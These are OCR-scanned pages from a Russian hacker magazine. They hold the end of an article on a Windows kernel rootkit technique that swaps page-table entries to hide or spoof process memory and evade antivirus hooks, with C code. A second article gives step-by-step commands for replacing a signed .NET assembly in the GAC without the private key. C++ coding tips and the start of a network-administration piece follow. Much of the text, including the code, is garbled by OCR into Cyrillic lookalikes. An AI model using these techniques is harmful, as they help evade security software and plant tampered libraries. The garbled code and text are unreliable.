вычислить его присутствие в оперативной 
памяти может лишь сигнатурный поиск по 
всей физической памяти или использование 
гипервизора. Много ли современных анти- 
вирусов способны на подобное? Если учесть, 
что зачастую данные в силу фрагментирован- 
ности разбросаны по всему жесткому диску, а 
гипервизор — неподъемная задача, то руткит 
оказывается не под силу обычным антивиру- 
сам. Существует и программный поиск сокры- 
тых ЗЬасІоѵѵ ѴѴаІкег страниц в памяти; более 



подробно об этом можно почитать здесь бир:// 
ѵ\лллллЬі-дгоир.пеі/32 . однако он ненадежен. 

СПОСОБ ДВА, 

ИЛИ «НЕ ВЕРЬ ГЛАЗАМ СВОИМ» 

Теперь перейдем ко второму, крайне 
интересному, но практически неизвест- 
ному в широких кругах способу мани- 
пуляций с содержимым виртуальной 
памяти. Находясь в ядре, мы всегда 
сможем попасть в адресное простран- 
ство любого процесса, вызвав функцию 
КеАіТасбРгосезз. Что она делает, я думаю, 
ты понимаешь. Также уверен, что тебе 
знакома такая фича, когда, находясь в 
адресном пространстве, ты можешь отно- 
сительно безопасно писать данные вызо- 
вом функции ЕѵѵѴѴгАеРгосеззМетогу, — т 
уже расказывал об этом. Увы и ах! Всякий 
мало-мальски нормальный антивирус 
обычно хукает такую опасную функцию, ибо 
ее использование стоит на первом месте у 
злых кодеров. Но теперь (и я хочу, чтобы ты 
прочувствовал всю значимость момента!], 
используя форму организации страничной 
памяти, можно изменять данные в адрес- 
ном пространстве без записи данных; ведь 
надо просто подменить РТЕ нужного нам 
виртуального адреса! Здесь виртуальная 
память процесса останется нетронутой, но 
при обращении к адресу подмены менед- 
жер памяти вернет запрашивающему те 
данные, которые нам нужно подсунуть! 
Смотрим КОД: 
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Линейный адрес 



31 



Каталог 



22 21 12 11 



Таблица Смещение 



о 



/ 



/ 



ю 



/ 

/ 10 



Каталог страниц 



-► Запись каталога 



/^2 4-Кб страница 



Таблица страниц 



Запись таблицы 



тТ 






Физический адрес 



20 



И 



/ 

32 



его 



КАК. .РАСКЛАДЫВАЕТСЯ» ЛИНЕЙНЫЙ АДРЕС 



ВЫЧИСЛИТЬ ПРИСУТСТВИЕ ЭТОГО РУТКИТА В ОПЕРАТИВНОЙ ПАМЯТИ 
ДО СИХ ПОР МОЖЕТ ЛИШЬ СИГНАТУРНЫЙ ПОИСК ПО ВСЕЙ ФИЗИЧЕСКОЙ 
ПАМЯТИ ИЛИ ИСПОЛЬЗОВАНИЕ ГИПЕРВИЗОРА. МНОГО ЛИ АНТИВИРУСОВ 
СПОСОБНЫ НА ПОДОБНОЕ? 



Подмена страниц РТЕ по нужному адресу 

ШОІШ СЬапдеРТЕОЕТагдеЬ (БѴГОКВ ѴігСиаІАсІсІгеззОііТагдеЦ , 
ВШКВ ЫеѵѵѴігСиаІАсІсІгезз ) 

{ 

ВШКВ ѵаТагдеСРТЕасІсІгезз ; 

ШОКБ ѵаТагдеСРТЕ; 

ШОКБ ЫеѵѵѴАРТЕасісІгезз ; 

ШОКБ ЫеѵѵѴАРТЕ; 

ВШКВ зоигсе; 

зоигсе = ѴігСиаІАсІсІгеззОііТагдеЦ ; 
зоигсе = зоигсе » 12 ; 
зоигсе = зоигсе « 2; 

ѵаТагдеСРТЕасІсІгезз = ОхСООООООО + зоигсе; 
ѵаТагдеСРТЕ = *ѵаТагдеСРТЕас!с1г ; 

зоигсе = ЫеѵѵѴігСиаІАсІсІгезз ; 
зоигсе = зоигсе » 12 ; 
зоигсе = зоигсе « 2 ; 

ЕеѵѵѴАРТЕасІсІгезз = ОхСООООООО + зоигсе; 

Ыеѵ^ѴАРТЕ = *ЫеѵѵѴАРТЕас1с1гезз ; 



азгп сіі 

ѵаТагдеСРТЕасІсІгезз = зоигсе; 

азш зСі 

геСигп зоигсе; } 

Вот в принципе и все. Если постараться, то можно сократить и усовер- 
шенствовать этот код. Столь простая, но крайне эффективная техника 
может легко использоваться для подмены данных в адресном про- 
странстве процесса (сколько простора для геймчитеров!) или вызывать 
напрямую похуканые проактивными защитами важные системные 
функции. 

ПУТЕШЕСТВИЕ В ЗАЗЕРКАЛЬЕ 

На примере этой статьи можно видеть, что мир процессов — а это игры, 
антивирусные программы, да все что угодно, что крутится в таекменедже- 
ре ѴѴіпсІоѵѵз — довольно зыбок и нельзя однозначно полагаться на то, что 
ты видишь собственными глазами. В общем, «ТЬе таітіх баз уои, ІЧео!». 
Мир виртуальной памяти ѴѴіпсІоѵѵз поистине захватывает, и путешествие 
в его глубины сродни путешествию в Зазеркалье. Приложишь немного 
усилий — и тебе станет подвластна вся операционная система. Удачного 
компилирования и да пребудет с тобой Сила! т 
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ССЮІЫб 



■ ■АЛЕКСЕЙ БОЙКО АІ_ЕХЕѴВВВгаеМАІІ_.СОМ 




МОДИФИЦИРУЕМ ПОДПИСАННЫЕ БИБЛИОТЕКИ В Ш 

ЗАДУМАЛСЯ Я ТУТ НАД СМЫСЛОМ ПОДПИСАНИЯ компоновочных 
БЛОКОВ ЖТ. НАВЕРНЯКА. ТЫ ТОЖЕ ПОДПИСЫВАЛ СВОИ БИБЛИОТЕКИ. 
ЧТОБЫ УСТАНОВИТЬ ИХ В 6АС. В ХОДЕ СЕГОДНЯШНЕГО РАССЛЕДОВАНИЯ 
МЫ НАУЧИМСЯ ИЗМЕНЯТЬ ПОДПИСАННЫЕ СБОРКИ. НЕ ОБЛАДАЯ 
ИСХОДНИКАМИ И СЕКРЕТНЫМИ КЛЮЧАМИ. 



ПРИВАТНЫЕ СБОРКИ 

При подписании библиотеки (назначении 
строгого имени) открытый ключ записывается 
в манифест. Таким образом, чтобы внести 
изменения в чужую подписанную библиоте- 
ку, нужно просто заменить публичный ключ 
на свой. Или — еще проще — сделать новую 
сборку с таким же именем и подписать на 
своем ключе. 

При использовании библиотеки любой публич- 
ный ключ будет принят как доверенный. 
Проведем эксперимент, создадим небольшую 
библиотечку: 

Библиотека зідпесіиь.сііі 

пашезрасе зідпесІЫЬ 
{ 

риЫіс сіазз зЫЪ 
{ 

риЫіс зСаСіс іпС СеДЫигпЬег ( ) 

{ 

геСигп 1 ; 

} 

} 

} 

Подпишем ее и добавим к проекту консольного 
приложения: 

Консольное приложение сНапдеКеу.ехе 

пашезрасе сЬапдеКеу 
{ 



сіазз Ргодгаш 
{ 

зСаСіс ѵоісі Маіп (зСгіпд [ ] агдз) 
{ 

Сопзоіе . ШгіСеЫпе ( 
зідпесІЫЪ . зЫЪ . ОеСЫишЬег ( ) ) ; 
Сопзоіе . КеасІЬіпе ( ) ; 

} 

} 

} 

Затем скомпилируем релиз проекта. С помо- 
щью .ЫЕТ ПеНесЬг [1] и плагина НеНехіІ [2] 
отредактируем ІІ_-код подписанной библио- 
теки (зідпесі ЫЬ.сШ), так что ОеШитЬегО будет 
возвращать не «1», а «2». Консольное при- 
ложение не заметило подмены и вывело «2». 
Вывод: подменить/изменить приватную сборку 
со строгим именем очень просто. Другие сбор- 
ки, ссылающиеся на измененную, никак на это 
не реагируют, несмотря на то, что они были 
скомпилированы с оригинальной. Обращаю 
внимание, что речь идет именно о приватных 
сборках, со сборками в ОАО дело обстоит 
иначе. 

СБОРКИ В 6АС 

Как мы только что убедились, подписанные 
приватные компоновочные блоки можно легко 
модифицировать. При этом необязательно 
обладать исходниками, секретным ключом, 
правами администратора. 



Вносить изменения в сборки, установленные в 
ЗАО, не многим сложнее. В случае с приватны- 
ми сборками их «подписанность» никакой роли 
не играет. Подпись не проверяется, а «полный 
идентификатор приватного компоновочного 
блока состоит из имени компоновочного блока 
и числового номера его версии» (из книги Э. 
Троелсена, если что :]]. Сборки, устанавли- 
ваемые в 6АС, должны иметь так называемое 
строгое имя. Сборка получает строгое имя в 
момент ее подписания. Идентификаторы сбо- 
рок в САС дополняются параметрами публич- 
ного ключа, подписи проверяются. Замуровали, 
демоны! Что же это получается? Окружили со 
всех сторон: 

• Незаметно внести изменения не получится — 
подпись проверку не пройдет. 

• Свой публичный ключ не подсунешь — иден- 
тификатор сборки изменится. 

Тем не менее, не нужно быть криптографом, 
чтобы все же изменить библиотеку в САС. 
Требуется лишь обладать правами администра- 
тора и знать параметры утилиты зп.ехе (стра- 
дальцы, не имеющие Студии, вручную использу- 
ют стандартную ^пилиту зп.ехе для подписания 
компоновочных блоков). Итак, возьмем проект 
уже знакомой библиотеки зідпесНіЬ.сІІІ (смотри 
выше). Подпишем ее и установим в САС. 

дасиСіІ.ехе /і Б:\ргсдесСз\ 
сЬапдеКеу \ з і дпесІЫЬ \ Ып \ Ке 1 е а з е \ 
зідпесІЫЬ. сііі 
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ПАПКИ НИЖЕ 
С:\ѴѴШ00ѴѴ5\ 
А55ЕМВІ.Ѵ 




ЦИФРОВАЯ 

ПОДПИСЬ 

НАРУШЕНА 



Добавим референс к консольному приложению сбапдеКеу. 
ехе. Компилируем релиз, убеждаемся, что в папке с про- 
граммой нет файла зідпесі ЫЬ.сІЦ (это значит, что сборка 
будет загружена из ОАО]. Запускаем сбапдеКеу.ехе — при- 
ложение показывает «1». 

С этого момента воображаем себя атакующими — у нас нет 
исходников, нет секретного ключа. Но надо, чтобы метод 
ЗеШитЬегО возвращал не 1, а 2. 

Структуру файлов ниже СДѴѴіпсІоѵѵзѴаззетЫу проводник 
ѴѴіпсІоѵѵз не показывает. Создадим псевдодиск, на который 
будет проецироваться нужный каталог: 

зиЪзк Ь: С : \Мп<іоѵ^з\аззешЫу 

В проводнике появился диск В. 

.Ыеі-сборки попадают в папку ЭАС_М5ІІ_; находим нужную 
папку (ее название совпадает с названием .611 файла). 
Внутри будет еще одна папка, а в ней, наконец, зідпесНіЬ. 
би. Копируем зідпебЫЬ.би на рабочий стол. 

С помощью замечательной программы .ЫЕТ Рекесіюг и не 
менее замечательного плагина Веібехіі (на нашем диске 
все это хозяйство тебя уже заждалось) мы будем редак- 
тировать библиотеку. Предварительно перепишем токен 
публичного ключа и его значение в блокнот (пригодятся 
позже). Как мы уже знаем, публичный ключ записан в 
самой сборке, и теперь в этом можно окончательно убе- 
диться. 

После правки ІІ_-кода и сохранения изменений программа 
сообщит о том, что цифровая подпись нарушена и предло- 
жит варианты дальнейших действий. 

Нажимаем «Петоѵе Зігопд Ыате» — удалить цифро- 
вую подпись. Закрываем сборку (теоретически закры- 
вать сборку нет необходимости и нам должен подойти 
вариант «Ведізіег К Ьг ѵегібсакоп зкірріпд», однако у 
меня эта операция заканчивается ошибкой; к тому же, 
в обучающих целях лучше проделать все вручную). 
Теперь у нас есть: 

• Измененная, неподписанная 611; 

• Публичный ключ оригинальной библиотеки. 

Осталось установить ее в ОАО. Для этого воспользуемся 
механизмом отложенной подписи. Если сборка содержит 
информацию о публичном ключе, но не имеет цифровой 
подписи — говорят, что она имеет отложенную подпись 
(придумал это какой-то надмозг из Майкрософт «с целью 
тестирования»). 

Сделать такую сборку с помощью .ЫЕТ Пекесіюг не состав- 
ляет никакой сложности — нужно заполнить соответствую- 
щие поля, они выделены желтым на рисунке «Параметры 
публичного ключа» (мы копировали их значения в блокнот). 
И не забудь поставить галочку «НазРиЫісКеу» (в теории 
публичный ключ нужно извлекать из секретного с помощью 
утилиты зп.ехе и потом с помощью нее же создавать отло- 
женную подпись). 

Итак, мы получили сборку, которая называется также, 
как оригинальная, имеет такую же версию и такой же 
публичный ключ. Получается, если ее установить в ОАО, 
она получит точно такой же идентификатор, что и ори- 
гинальная (смотри начало статьи). Как я писал выше, по 




ПАРАМЕТРЫ ПУБЛИЧНОГО КЛЮЧА 



умолчанию у сборок в САС проверяется подпись, однако 
проверку подписи можно отключить — опять же «для 
тестирования». 

Чтобы отключить проверку подписи сІИ на данном компьюте- 
ре, нужно воспользоваться зп.ехе: 

зп -Ѵг С : \ІІзегз\АІех\ВезкСор\зідпе(іЦіЬ . <3.11 

Удаляем оригинальную сборку из ЗАО: 

дасиСіІ /и зідпесІЬіЪ, Ѵегзіоп=1 . О . О . О , СиІСиге= 
пеикгаі , РиЫісКеуТокеп=2ЫЬ71846е7614бе 




> іпіо 

Для комфортного 



чтения статьи нужно 
обладать базовыми 
знаниями в области 
криптографии с от- 
крытым ключом. 



И устанавливаем измененную: 
дасикіі /і 

С : \изегз\АІех\Безккор\зідпесІЬіЪ. сііі 

Радуемся, глядя на выведенную дасибі.ехе надпись: 

АззеітЫу зиссеззкиііу асісіесі ко кЬ.е саске 

Вот мы и добились желаемого — изменили библиотеку, 
установленную в ОАО. Чтобы еще раз порадоваться (и про- 
верить результат), запускаем наше приложение сбапдеКеу. 
ехе, которое в начале статьи выводило 1. Ура, теперь он 
покажет 2! 




> СІѴСІ 

Упомянутый в статье 
софт и некоторые 
дополнительные 
ништяки от автора 
ты можешь найти на 
нашем диске. 



ПОДВЕДЕМ ИТОГ 

САМОЕ ВРЕМЯ ПОДВЕСТИ ИТОГ НАШИМ СЕГОДНЯШНИМ 
СВЕРШЕНИЯМ. СДЕЛАЕМ ЭТО ПО ПУНКТАМ: 

• Публичный ключ записан в самой сборке (точнее, в мани- 
фесте); 

• В случае с приватными сборками подписи не проверяют- 
ся. 

Чтобы изменить сборку в СА6, нужно: 

1. Сделать копию нужного сИІ-файла из САѴѴіпсІоѵѵзѴаззетЫу 
(воспользовавшись командой зиЬзД 

2 . Извлечь из сборки публичный ключ. 

3. Модифицировать И-код сборки и удалить цифровую под- 
пись. 

4 . Добавить к измененному файлу публичный ключ, получен- 
ный на шаге 2 (создадим отложенную подпись). 

5 . Отменить проверку цифровой подписи для модифициро- 
ванной сборки на данном компьютере. 

6. Удалить оригинальную сборку из ОАО. 

7 . Установить модифицированную сборку. 

Для реализации шагов 5-7 нужно обладать правами 
администратора. Вот и все! На этом позволь откланяться 
и пожелать тебе огромных творческих узбеков на ниве 
исследований программного обеспечения, тг 
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ПРОГРАММЕРСКИЕ 

ТИПСЫИТРИКСЫ 

Три правила кодинга на С++ для настоящих спецов 

ПРОДОЛЖАЕМ ИЗУЧАТЬ ПОДВОДНЫЕ КАМНИ ЯЗЫКА С++. 

В ЧЕТВЕРТОЙ ЧАСТИ НАШЕГО ЗПИЧЕСК0Г0 ПОВЕСТВОВАНИЯ 
МЫ. КАК ВСЕГДА. УЗНАЕМ ТРИ ПРАВИЛА. БЛАГОДАРЯ КОТОРЫМ 
ЖИЗНЬ ПРОСТОГО СРР-КОДЕРА СТАНЕТ ЧУТОЧКУ ПРОЩЕ. ЧИТАЕМ 
И ПРОСВЕЩАЕМСЯ. ВЕДЬ СЛЕДУЮЩИЕ НЕСКОЛЬКО СТРАНИЦ 
РАССКАЖУТ НАМ ПРО БЕЗОПАСНОСТЬ ОТНОСИТЕЛЬНО ИСКЛЮЧЕНИЙ. 
ШШЕ-ФУНКЦИИ И УМЕНЬШЕНИЕ ЗАВИСИМОСТИ ФАЙЛОВ ПРИ 
КОМПИЛЯЦИИ. 

ѵоісі сЬапдеВаскгоипсі ( 
зксі: :ізкгеат& ітдЗгс) ; 

ргіѵаке : 



ПРАВИЛО №1 

Предположим, у нас есть некий класс, 
который отображает пункты меню с фоновым 
рисунком (ЬаскгоипсІ). Класс рассчитан на 
работу в многопоточном приложении. Для 



смены бэкраунда используется функция 
сбапдеВаскгоипсІ: 

Класс РгеНуМепи 

сіазз РгеккуМепи { 
риЫіс : 
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Микех тиЬех; 

Ітаде * Ьдітаде; 
іпі; ітадеСЬапдез ; 

} ; 

ѵоісі РгеЬЬуМепи: : сЬапдеВаскгоипсІ ( зксі: : ізкгеат& ітдЗгс) 

{ 

Іоск (&тикех) ; 

ЬеІеЬе Ьдітаде; 

++ ітадеСЬапдез ; 

Ьдітаде = пем Ітаде (ітдЗгс) ; 

ипіоск (&тикех) ; 

} 

Сточки зрения безопасности в плане исключений эта функция чуть луч- 
ше, чем просто ужасна. А все потому, что она не выполняетдва основных 
требования: «не допускать утечки ресурсов» и «гарантировать целост- 
ность структур данных». 

Код функции сЬапдеВаскгоипсІ, в случае возбуждения исключения 
строкой пеѵѵ Ітаде(ітд5гс], никогда не освободит мьютекс, потому 
что управление просто не дойдет до функции ипіоск. Исправить это 
достаточно просто, нужно лишь использовать объекты управления 
ресурсами. В предыдущих статьях мы подробно говорили о них. Тело 
функции сЬапдеВасЬгоипсІ после применения управляющего объекта 
будет выглядеть примерно так: 

Использование управляющего объекта класса І_оск 

ѵоісі РгеЬЬуМепи: : сЬапдеВаскгоипсІ (зЬсі: : ізкгеат& ітдЗгс) 

{ 

Ьоск ті (тиЬех) ; 

ЬеІеЬе Ьдітаде; 

++ ітадеСЬапдез ; 

Ьдітаде = пем Ітаде (ітдЗгс) ; 

} 

Мало того, что мы теперьточно знаем, что мьютекс всегда будет 
освобожден позавершению функции (втом числе и при возбуждении 
исключения], так еще и код стал намного удобнее для восприятия. 
Целостность данных наша функция тоже не может гарантировать. Если 
пеѵѵ Ітаде(ітдЗгс) возбудит исключение, в Ьдітаде останется указатель 
на удаленный объект. Болеетого, счетчикітадеСЬапдезувеличится, 
несмотря на то, что новая картинка не будет установлена. Отлично, 
будем разбираться. 

Существуюттри вида гарантии безопасности структур данных: 

• базовая гарантия; 

• строгая гарантия; 

• гарантия отсутствия исключений. 

Базовая гарантия подразумевает, что любой сценарий выполнения 
функции не приведет к порче данных. То есть, даже в случае неудачного 
конструирования объекта ітдЗгс указатель Ьдітаде будет ссылаться на 
корректную картинку. Тут нет однозначности. Этой картинкой может быть 
предыдущий фон, а можетбытьфон поумолчанию ит. д. Пользователи 
кода не смогутточно знать, что там находится и нам придется вводить 
дополнительные функции. 

Строгая гарантия подразумеваеттолько два состояния: «до выполнения 
функции» и «после». Иначе говоря, функция фактически является ато- 



марной и в случае, если что-то пойдет нетак, гарантирует, что состояние 
всех переменных будеттакое же, как и до ее запуска. Гарантия отсут- 
ствия исключений подразумевает под собой, что код, обеспечивающий 
такую гарантию, никогда не возбуждает исключений, а всегда делает 
то, что должен. Этого можно добиться, если работать исключительно со 
встроенными типами. Но в рамках языка С++ оченьтрудно предоставить 
такую гарантию, поскольку любой класс, использующий динамическое 
распределение памяти, может возбуждать исключение ЬасІ_аиос. 

Для функции сЬапдеВаскгоипсІ предоставить «почти строгую» гарантию 
нетрудно. Во-первых, нужно обернуть Ьдітадеумным указателем (объ- 
ектом управления ресурсами]. Строго говоря, так надо делать всегда, 
это позволит избежать утечки ресурсов. Во-вторых, требуется изменить 
порядок предложений в функции сЬапдеВаскгоипсІ, чтобы значение 
счетчика неувеличивалосьдотех пор, пока картинка не будет заменена. 
Вот какой код получается в результате: 

Строгая гарантия 

сіазз РгеЬЬуМепи { 
риЫіс : 

зЬсІ: : Ьгі : : зЬагес!_рЬг< Ітаде > Ьдітаде; 

} ; 

ѵоісі РгеЬЬуМепи: : сЬапдеВаскгоипсІ ( зЬЬ : : ізкгеат& ітдЗгс) 

{ 

Ьоск ті (тикех) ; 

Ьдітаде . гезек (пеѵ/ Ітаде ( ітдЗгс) ) ; 

+ + ітадеСЬапдез ; 

} 

Теперь не надо в ручную удалять старую картинку; за нас это делает интел- 
лектуальный указатель. Удаление происходиттолько в случае, если новая 
картинка уже создана. Но не всегда можно обеспечить «строгую гарантию», 
особенно если функция вызывает другие, которые не даюттакой гарантии. 
Например, у насесть функция зотеРипс, которая вызываетИ и \Ъ. 

ѵоісі БотеРипсО 

ѵоісі зотеРипс ( ) 

{ 

Т1() ; 

Т2 ( ) ; 

} 

Ясное дело, что если И и \2 не обеспечивают строгих гарантий, то 
будеттрудно их обеспечить и для зотеРипс. Болеетого, даже если 
эти функции и даюттакие гарантии, ситуация в целом не поменяется. 
Предположим, что И успешно отработала, а Т2 вызвала исключение. 
Тогда зотеРипсуже несможетвосстановитьначальныезначения всех 
переменных, так какИ уже, возможно, что-то изменила и пользователи 
этого кода могут работать с новыми значениями переменных (например, 
если И изменяетзаписи в БД]. 

Обеспечивать строгую гарантию часто очень накладно в плане расхода 
системных ресурсов. Поэтому в некоторых случаях стоит сосредоточить- 
ся на базовой гарантии. 

В итоге надо помнить, что безопасные относительно исключений 
функции не допуска ют утечки ресурсов и повреждения структур данных. 



ХАКЕР 03 /134/ 10 



► 111 



Строгая гарантия часто может быть реализована посредством копиро- 
вания и обмена, но предоставлять ее для всех функций непрактично. 

И, наконец, функция обычно может предоставить гарантию не строже, 
чем самая слабая гарантия, обеспечиваемая вызываемыми из нее 
функциями. 

ПРАВИЛО №2 

Теперь немного о встраиваемых функциях. Этот замечательный 
механизм служитзаменой макросов в С++. При использовании іпііпе- 
функций мы нетолько избегаем накладных расходов, связанных с вызо- 
вом функций, но и получаем более высокий уровеньоптимизации кода. 
Дело втом, что оптимизация, выполняемая компилятором, наиболее 
эффективна на участке кода, не содержащем вызовов функций. 

Не стоитувлекаться.таккакчрезмерное использование встраивае- 
мых функций приводит к разбуханию кода. В итоге может получиться, 
что программа разбухнет в памяти, и скорость ее исполнения заметно 
снизится. Блоки кода могут просто кэшироваться в файле подкачки, что, 
понятно, не совсем хорошо, так как работа с жестким диском гораздо 
медленнее, нежели с оперативной памятью. Тело встроенной функции 
должно быть достаточно маленьким; в этом случае код, сгенерирован- 
ный для нее, может быть короче кода, сгенерированного для вызова 
функции. 

Директива іпііпе — всего л ишь совет компилятору, а не команда, поэтому 
компилятор может встроить функцию, а может и нет. Инлайн-функцию 
можно объявить неявно, определивтело функции внутри определения 
класса: 

Неявное определение іпііпе-функции 

сіазз Регзоп { 
риЫіс : 

/ / неявный запрос на встраивание 
іпС аде ( ) сопзС { гебигп ЫеАде; } 

ргіѵаСе : 

іпС ЫеАде; 

} ; 

Большинство компиляторов отвергают встраивание функций, которые 
представляются слишком сложными, или если функция объявлена 
виртуальной. Дескриптор ѵігІиаІозначает«ка кую точно функцию вы- 
звать, определяется в момент исполнения», а іпііпе - «перед исполне- 
нием заменить вызов функции ее кодом». Если компилятор не знает, 
какую функцию ему вызвать, то и встроить он ее не может. Большинство 
компиляторов выдают предупреждение о невозможности выполнить 
запрошенное встраивание. 

Встречаются случаи, когда функция может быть одновременно встраи- 
ваемой и не встраиваемой, например, если мы пытаемся получить 
указатель на нее. В этом случае генерируется ее код, так как указатель 
должен на что-то ссылаться: 

Указатель на іпііпе-функцию 

іпііпе ѵоісі і() (...) 

ѵоіб ( *рі) О = і; 

// этот вызов будет встроенным 

і(); 

//а этот, скорее всего, нет 
Р* ( ) ? 

Самыми неудачными кандидатами на встраивание будут конструкторы и 
деструкторы. Рассмотрим пример: 



Кандидаты на встраивание 

сіазз Вазе { 
риЫіс : 

ргіѵабе : 

збсі: : зЫіпд Ьші , Ьш2 ; 

} ; 

сіазз Бегіѵесі: риЫіс Вазе { 
риЫіс : 

Бегіѵеб ( ) { } 

ргіѵабе : 

збсі: : зЫіпд бші , бш2 , бшЗ ; 

} ; 

Конструктор дочернего класса выглядит как идеальная функция для 
встраивания, поскольку ее тело не содержит никакого кода. Но это не 
совсем так. Стандарты языка С++ накладывают довольно строгие обяза- 
тельства на конструкторы и деструкторы. Первые должны инициализи- 
ровать внутренние переменные, вызывать конструкторы родительских 
классов, корректно обрабатывать исключения, возникшие в результате 
неудачного создания внутренних переменных и т. д. Деструкторы дела- 
ютто же самое сточностью до наоборот. 

Все это происходит не само собой; для этих целей компилятором 
генерируется специальный управляющий код. Он иногда помещается 
в конструкторы и деструкторы. В итоге, тело Бегіѵеб может выглядеть 
примернотак: 

Код, генерируемый компилятором 

Бегіѵеб : : Бегіѵеб ( ) 

( 

Вазе : : Вазе ( ) ; 

Ыу (сіті . збсі: : зЫіпд : : зЫіпд ( ) ; } 
саІсЪ. (...) { 

Вазе : : -Вазе ( ) ; 

ТІЬягсж ; 

} 

Ыу (с1т2 . збсі: : зЫіпд : : зЫіпд ( ) ; } 
саЫЪ. (...) { 

(ЗтІ.зіЫ: : зЫіпд: : -зЫіпд () ; 

Вазе : : -Вазе ( ) ; 
спгсж; 

} 

Ыу (бтЗ . зіЫ: : зЫіпд : : зЫіпд ( ) ; } 
саІсЪ. (...) { 

сЗш2 . збсі : : зЫіпд : : -зЫіпд ( ) ; 
бті.збсі: : зЫіпд: : -зЫіпд () ; 

Вазе : : -Вазе ( ) ; 

11пгоѵ7; 

} 

} 

Получается, наш конструктор нетакуж и подходит для встраивания, 
а если учесть, что конструкторы родительских классов и внутренних 
переменныхтоже могутбыть встроенными, то налицо многократное раз- 
бухание кода. Что не преминетсказаться на его производительности. 
Разработчики библиотектакже должны с осторожностью относиться 
к іпііпе -функциям. Если те есть в библиотеке, то при ее обновлении 
придется перекомпилировать весь проект, чтобы новыетела функций 
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встроились заново. Большинство же крупных проектов очень на- 
кладно перекомпилировать целиком, так как это занимает слишком 
много времени, да и вообще, об обновлении библиотеки может никто 
не знать. 

Большинство дебаггеров неумеют корректно работать с іпііпе- 
функциями, поэтому на этапе отладки все встроенные функции 
превращаются в совершенно обычные. Таким образом, на начальном 
этапе разработки лучше отказаться от встраиваемых функций, а потом 
уже аккуратно выбрать те, которые действительно должны получить 
директиву іпііпе. 

Подводя итогэтому правилу, запомним, что делать встраиваемыми 
следуеттолько небольшие, часто вызываемые функции. Также не нужно 
объявлять шаблоны функций встроенными только потому, что они по- 
являются в заголовочных файлах. 

ПРАВИЛО №3 

Представим самую обычную ситуацию: мы открываем нашу програм- 
му на С++, вносим в реализацию какого-либо класса изменения и за- 
пускаем процесс компиляции. Если программа достаточно большая, 
товнеймного зависимостей, что приведет к долгой перекомпиля- 
ции. А изменения мы вносили даже не в интерфейс класса, а всего 
лишь в реализацию (например, добавили переменную в раздел 
ргіѵаіе], то есть в ту часть класса, которая скрыта от его клиентов. 
Компиляция всего кода, использующего класс с измененной реали- 
зацией, в этом случае выглядит нелогично. 

Все дело в том, что С++ не проводит сколько-нибудь значимого разли- 
чия между интерфейсом и реализацией: 

Интерфейс и реализация 

#іпс1исіе <зБгіпд> 

#іпс1ис!е ЫаЫ.Ъ" 

#іпс1ис!е " аЫгезз .Ь." 

сіазз Регзоп { 
риЫіс : 

Регзоп ( сопзС зЫ: : зСгіпд& пате, 
сопзС БаЫ& ЬігСМау, 
сопзС А<Ыгезз& асИг) ; 
зЫ: : зСгіпд пате ( ) сопзС; 
зЫ: : зСгіпд ЪігЫБаБе ( ) сопзС; 
зЫ: : зСгіпд аскігезз ( ) сопзС; 

ргіѵаСе : 

// детали реализации 
зЫ: : зСгіпд ЫеЫате; 

БаЫ ЫеВігЫБаБе; 

АсМгезз МгеАсМгезз ; 

} ; 

Главная причина, почему С++ настаиваетна размещении деталей 
реализации класса в его определении — это необходимость знать 
размер объектов во время компиляции для выделения памяти под них. 
Вследствие этого мы не можем использовать опережающее описание, 
которое может избавить нас отзависимостей между реализацией и ин- 
терфейсом в С++. Есть два способа избавиться оттакихзависимостей: 
класс-дескриптор и интерфейсный класс. Суть первого метода заключа- 
ется в том, что нужно создать два класса: один — для представления 
интерфейса, а другой — для его реализации. Если класс, содержащий 
реализацию, назвать Регзопітрі.то Регзоп должен выглядеть так: 

Класс-дескриптор 

#іпс1іМе <зБгіпд> 

#іпс1исіе <тетогу> 



// опережающие определения 
сіазз Регзопітрі; 
сіазз БаЫ; 
сіазз АсМгезз; 

сіазз Регзоп { 
риЫіс : 

Регзоп ( сопзС зЫ : : зРгіпд& пате, 
сопзЬ БаЫ& ЫгММау, 
сопзС АсМгезз& асМг) ; 

зЫ: : зРгіпд пате ( ) сопзР; 
зЫ: : зБгіпд ЪігЫБаЫ ( ) сопзР; 
зЫ: : зРгіпд аЫгезз ( ) сопзБ; 

ргіѵаРе : 

зЫ: : Сгі : : зЬагесі_рРг<РегзопаІтр1> рітрі; 

} ; 

Здесь главный класс Регзоп не содержит никаких данных членов, кроме 
указателя на свой класс реализации. При таком дизайне пользователи 
класса Регзоп не видят деталей реализации — дат, адресов и имен. 
Реализация может быть модифицирована какугодно, при этом моди- 
фицировать программы, в которых используется Регзоп, не придется. 
Функции-члены класса Регзоп просто переадресовывают все вызовы 
соответствующим классам реализаций. 

Второй подход, позволяющий избавится оттаких зависимостей (интер- 
фейсные классы), реализуется немного по-другому. Объявляется класс с 
набором чисто виртуальных функций (которые и являются интерфейсом), 
а затем выступает в качестве родительского класса для реализации: 

Интерфейсный класс 

сіазз Регзоп { 
риЫіс : 

ѵігіиаі -Регзоп ( ) ; 

ѵігіиаі зіЫ: : зБгіпд пате ( ) сопзС = 0; 
ѵігБиаІ зіЫ : : зБгіпд ЫгЫэБаБе ( ) сопзС = 0; 
ѵігСиаІ зЫ: : зБгіпд асМгезз () сопзС = 0; 

} ; 

Пользователи этого класса должны программировать в терминахука- 
зателей и ссылок на Регзоп, потому что невозможно создать экземпляр 
класса, содержащего чисто виртуальные функции. Пользователям 
интерфейсных классов, как и пользователям классов-дескрипторов, 
нетнужды проводить перекомпиляцию до тех пор, пока не изменится 
интерфейс. 

Пользователи интерфейсных классов обычно используюттак называе- 
мые функции -фабрики. Они возвращают указатели на динамически 
распределенные объекты, которые поддерживают интерфейс интер- 
фейсного (ого, масло масляное) класса. Нередко подобные функции 
объявляют какстатические внутри интерфейсного класса. 

Оба метода предполагаютснижение производительности программы, 
но зато мы получаем более гибкий и масштабируемый код, что в буду- 
щем поможет избежать множества ошибок и проблем. 

ЗАКЛЮЧЕНИЕ 

Вот и все. Новая порция советов кодинга на С++ выдана. Засим я за- 
канчиваю. 

Надеюсь, еще увидимся — ведь С++ полон тонкостей и сюрпризов, и 
хватит их надолго, т 
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ЗУИ/АСК 



ікевич тагііпОзупаск.ги 



На коротком 
поводке 

ОГРАНИЧИВАЕМ ПОЛЬЗОВАТЕЛЕЙ, ВЫСЛЕЖИВАЕМ 
НАРУШИТЕЛЕЙ И НАВОДИМ ПОРЯДОК В ЛОКАЛЬНОЙ СЕТИ 

В любой организации есть юзвери, которые пытаются использовать 
ресурсы Сети в своих целях. В результате, несмотря на установленные 
